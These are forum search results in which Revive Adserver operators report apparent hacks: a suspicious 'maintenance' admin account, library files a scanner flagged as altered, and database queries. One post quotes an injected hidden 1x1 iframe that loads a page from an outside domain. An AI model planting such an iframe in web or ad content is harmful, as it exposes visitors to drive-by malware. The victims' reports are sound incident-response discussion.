Search the Community
Showing results for tags 'hacked'.
Found 4 results
Is there a default user with the username "maintenance" and the email address "support @ revive-adserver.com" with the user_id 999? Checking our database for a possible hack we found this user account and don't really know what this is, but I expect this user to be fake. date_created and date_last_login were both NULL.
Hi there, A security software that I use in my website runs a scan on php files every 24 hours to check for changes and when detected it provides a threat score. Normally only cache files change but today it has been the first time i see two libraries in the Revive Adserver installation have changed and a high threat score has been given to these files. they are: revive/lib/smarty/internals/core.smarty_include_php.phprevive/lib/smarty/internals/core.run_insert_handler.phpI did not upgrade anything on the Revive Installation which is on the latest version 3.2.2. Did these libraries get updated automatically? Thanks.
heya folks, as our ad infrastructure has been hacked multiple times, i was just playing around with my mysql proxy on my system for testing purposes. So, while i was looking at the screen i noticed something i have seen before - strange queries. "<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe>\";s:9:\"htmlcache\";s:169:\"<iframe src=\"http://ikromet.c0m.li/ZaARRCFGGgXtN9DBr6OZk5ZHOyKBLc1S\" name=\"Alexa\" scrolling=\"auto\" frameborder=\"no\" align=\"center\" height = \"1px\" width = \"1px\"></iframe> I saw that domain some time ago and now im wondering what this is. Im guessing that this is some code, which surely doesnt belong there. So now my question is, how it got there and what its supposed to mean and how i can get rid of it? kind regards, rene